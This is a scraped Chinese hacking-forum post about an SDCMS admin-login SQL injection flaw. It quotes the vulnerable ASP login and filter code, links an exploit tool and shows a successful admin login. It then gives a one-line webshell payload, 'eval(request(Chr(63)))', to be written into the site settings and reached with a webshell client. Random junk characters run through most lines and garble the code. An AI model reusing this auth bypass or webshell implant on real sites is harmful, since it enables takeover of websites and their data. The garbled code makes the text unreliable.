作者:T00LS 鬼哥
- b, A" j* a6 l: ?# Z5 H漏洞文件:后台目录/index.asp6 q- P7 S! y5 n; d+ W- o5 N
' P/ F5 K$ v; ^' \ VSub Check$ K# Q7 q% O' S7 U- X ?
Dim username,password,code,getcode,Rs H1 C8 Z) |1 f4 G1 [
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
9 x/ M' S9 u& V% H username=FilterText(Trim(Request.Form("username")),1)$ Y& k' |( b4 M. I
password=FilterText(Trim(Request.Form("password")),1)
( M$ {# }' p e" n code=Trim(Request.Form("yzm"))
& N0 j1 F) B1 r" v7 ]0 _ getcode=Session("SDCMSCode")
$ W: ? ^* u' k/ Y IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died. m5 I, \3 g2 u, ]- T( Z
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied- g& D$ x! o* N! Y9 n- M# k: R/ o* I
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
! h5 z; |9 u0 B4 p# L7 G IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
$ b+ N& F7 w2 Q5 W" C# m( ~+ q% a IF username="" or password="" Then
% ~& K6 n& P5 J4 _8 w! k3 C2 h Echo "用户名或密码不能为空"ied, a0 W' ^) k( z$ O' u& [4 Z
Else' E3 u2 @* ?3 i G8 o0 p
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")6 T% {7 }. `2 l. Y+ T
IF Rs.Eof Then
9 ^6 ]4 R* E6 H AddLog username,GetIp,"登录失败",1" n1 |% f% V; n- D& Z- o3 w; V
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"# p% a1 i6 J& _, o, Y
Else9 i+ _$ j, l. B4 U7 U" e1 r
Add_Cookies "sdcms_id",Rs(0)- e, X6 q+ E0 z
Add_Cookies "sdcms_name",username
# n' [' D- G( R( ^# J4 c Add_Cookies "sdcms_pwd",Rs(2)
% C8 r1 [0 ?6 ?0 e( L Add_Cookies "sdcms_admin",Rs(3)
6 G7 u* C0 s9 V5 F/ h# Z# U; v( t Add_Cookies "sdcms_alllever",Rs(4)# v4 B$ }6 ?% ~0 \4 v+ U
Add_Cookies "sdcms_infolever",Rs(5)
9 e% t' L) e2 H, D& {: X% [- N1 s Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
, @; }9 `4 l& @2 }% o; E" p0 L' l AddLog username,GetIp,"登录成功",1; M) {" F1 Q, I8 _
'自动删除30天前的Log记录6 [* m: q* Y P2 t9 a( t- P* R
IF Sdcms_DataType Then
F/ S8 z. b: W# U Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")5 W* ]' ]8 _( L0 N( i& g
Else8 g( v% B5 r. X8 S6 h
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
. ~ g* v1 }( E3 C: R% \$ i End IF/ Z, U4 _% a; ]3 Z7 f' h! z
Go("sdcms_index.asp")
S; L; }( o# B( T6 ? End IF
7 u1 F/ J; Y3 ?+ p Rs.Close
3 @3 Z% g9 E8 |: Z3 O Set Rs=Nothing! j$ O; b- [3 T2 s0 e$ ?# _0 p4 w. D
End IF. G0 ]5 S1 R/ K5 v
End Sub
* @2 V/ e: F8 ^
2 T; q3 h8 O% H+ T, s* i’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
# U. G" f' M6 d2 d+ }2 m
0 h/ y# l4 x" Q1 CFunction FilterText(ByVal t0,ByVal t1)
5 w$ x. P6 R& |, L IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function* K) }' I7 w) ]* y2 o8 F/ q, G
t0=Trim(t0)
( q+ w. r" U# v7 B" v; J Select Case t1
# j7 j3 R% V$ w1 ^) K8 T6 k6 M Case "1"
' h0 h ^$ O( l t0=Replace(t0,Chr(32),"")
- r0 g$ n% S$ c) I' t) Y$ Z# p t0=Replace(t0,Chr(13),"")
9 k7 E( ~2 ^ u2 o. p v1 @, A t0=Replace(t0,Chr(10)&Chr(10),"")- ~# p v) A- B) ?+ E3 r; Z
t0=Replace(t0,Chr(10),"")
$ \) `- J' H6 h7 c2 E Case "2"
6 ]- w4 X# Z$ y6 h* L7 p+ Y! Y t0=Replace(t0,Chr(8),"")'回格+ G' y# c; n3 ]
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
! F; `9 C h2 [# o t0=Replace(t0,Chr(10),"")'换行
* R7 Q5 M, D5 W4 T: ~ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)2 P: s3 I+ b% ]* T$ @
t0=Replace(t0,Chr(12),"")'换页$ v; U/ N/ n$ {7 R+ W9 z0 [
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
- t d6 B, f: x4 P1 q t0=Replace(t0,Chr(22),"")5 S7 K) _2 E, k5 N/ E' m
t0=Replace(t0,Chr(32),"")'空格 SPACE
9 ~0 t, w# Z7 a& h! L) D) G+ S( j. E t0=Replace(t0,Chr(33),"")'!* H( ~4 j3 r1 v+ L2 v8 `8 z% e
t0=Replace(t0,Chr(34),"")'"" ]# y& @. I) [0 K+ H% R# F
t0=Replace(t0,Chr(35),"")'#( V0 J- l9 t2 y
t0=Replace(t0,Chr(36),"")'$
: B* N& j' h1 [! \9 M: F* |6 z t0=Replace(t0,Chr(37),"")'%
7 Z0 `% y8 E: |) a4 { t0=Replace(t0,Chr(38),"")'&: P3 P" z; u- o& n* D! u
t0=Replace(t0,Chr(39),"")''7 a* H: p6 t: X) |9 ` O
t0=Replace(t0,Chr(40),"")'(
( Y6 O+ ?# _+ @$ i t0=Replace(t0,Chr(41),"")')- R+ |; e0 }! K0 D0 p
t0=Replace(t0,Chr(42),"")'* I) r5 r% q/ I2 k
t0=Replace(t0,Chr(43),"")'+- |" {4 j" R; m0 o$ D
t0=Replace(t0,Chr(44),"")',8 a; Q# x5 _7 w9 h) ~ `
t0=Replace(t0,Chr(45),"")'-
! F \1 i5 ~/ B# @- m5 m- b t0=Replace(t0,Chr(46),"")'.
* t' a8 g4 G) {+ n5 y0 o t0=Replace(t0,Chr(47),"")'/. [3 S) {% V& y. p# j5 H
t0=Replace(t0,Chr(58),"")':
; @3 i v" u! _8 {7 E2 W8 \ t0=Replace(t0,Chr(59),"")'; Y) T9 o) o% ^: l a% C& c ?- a4 o
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>- d. Q1 d% e$ n
t0=Replace(t0,Chr(63),"")'?
- D4 ~9 k6 l) a$ a0 J7 K3 F3 r+ m t0=Replace(t0,Chr(64),"")'@' Q, I2 Y' @& K% O2 b5 Q3 m
t0=Replace(t0,Chr(91),"")'\+ \; P( M/ n: F) x* k( I
t0=Replace(t0,Chr(92),"")'\& s3 r3 {+ d6 l* ?0 P q4 ~ W
t0=Replace(t0,Chr(93),"")']8 D+ c+ k4 }% Z m% N5 M
t0=Replace(t0,Chr(94),"")'^; c4 L9 d4 _! u7 c- o" v, C) `8 {
t0=Replace(t0,Chr(95),"")'_
! d0 E2 t. m* ~2 ~8 H/ h t0=Replace(t0,Chr(96),"")'`
' \- ? S/ `# y4 _* n- ?9 F t0=Replace(t0,Chr(123),"")'{* d' U# |4 Z' d* K
t0=Replace(t0,Chr(124),"")'|. E$ O$ A, f& S* p. A6 S
t0=Replace(t0,Chr(125),"")'}) @' ^8 [- ^* {& U
t0=Replace(t0,Chr(126),"")'~ y: v3 Y8 E% [
Case Else1 a; S- y8 F6 O X0 S
t0=Replace(t0, "&", "&")
' K% t* w9 D8 c! X t0=Replace(t0, "'", "'")
2 o/ l" D% h) o$ o5 s8 T& C9 T; C% v t0=Replace(t0, """", """)
5 R3 U5 q7 y" S* l+ W5 p/ m( H t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")1 s: s: P1 R' k0 @$ b* N0 Q
End Select& u: Z: V T6 ?( W0 M
IF Instr(Lcase(t0),"expression")>0 Then- M# ^' s7 g. P) i
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
. |# W8 V) b: M& o5 v7 r$ O End If k+ p0 R9 }) |, I" m! L8 ]
FilterText=t0
3 [2 }* g5 e/ m$ }% i4 B3 X* m8 hEnd Function+ L% u* s& I6 `: x4 J1 m
! u" ^! D9 T6 e, |7 w! ~$ B8 F
看到没。直接参数是1 只过滤) Z+ R- P. Z2 ^0 j3 m+ C
t0=Replace(t0,Chr(32)," ")/ N3 n" w1 N' T/ F, _
t0=Replace(t0,Chr(13),"")3 E$ K2 e: c4 _" R! V
t0=Replace(t0,Chr(10)&Chr(10),"" B8 o' Q) n/ e$ d. E* B) ]/ F% ]
")
# r4 W& r8 n' j; I3 } t0=Replace(t0,Chr(10)," j; i3 D. ]3 ^) s& `
")
0 {+ w: \- v) ?7 m4 W* \8 `# d& K漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!. {$ @+ b/ c2 B% X; J v# n4 {, H
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP. O& ?* U7 n# C/ C: i
; N! M+ q5 I, N0 r- C5 B9 T
测试:! C p, q, c# ~/ c m8 V
% j8 z+ x4 A+ q/ w+ N \; ]
' b( X5 E% l* Y' G4 }7 _% t/ I
现在输入工具上验证码,然后点OK
- v# y. P/ i1 s
- g) J7 G: c& B5 R: h9 S8 c5 R) [' ]+ O4 i2 G1 ?+ B
看到我们直接进入后台管理界面了,呵呵!
1 X0 q' D6 _0 l! n9 p" d% G$ T' o6 ~3 V' S; m
7 |6 ?& n8 b3 }6 o; e* }* H
- D X" U$ @8 _) l8 T5 y; [# N这样直接进入后台了。。。。8 U' p1 Q' q4 o0 l& {
3 u) j+ `' c# [+ G e) \( G
0 b4 |, v9 Z2 ^3 k. E
2 z( u# [/ P) S- r1 w. k3 VSDCMS提权:
6 @- d" X. x9 L: x- p) z6 M5 E, x; m3 P! n
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?4 U+ U4 I( ?( R6 j
) `0 I# W' h1 \0 Z& Z" F- z& ~
: c% c3 V3 I; x& z2 ^ Y9 g
7 L2 d s b, ~+ H& L
OK,现在用菜刀连接下!
9 p( P0 t3 T; Q( B' z1 t) J! r
2 B8 H" }. ~+ P4 U& @1 Y) Y
8 K' ~( @3 O) u( }# a2 Q
- Q" z/ B, c: j B t
- y: Z0 E) B q7 u! j
. [% s$ P9 a( k4 N5 V: D, Z |
发表于 2012-11-9 20:57:02
收藏
支持
反对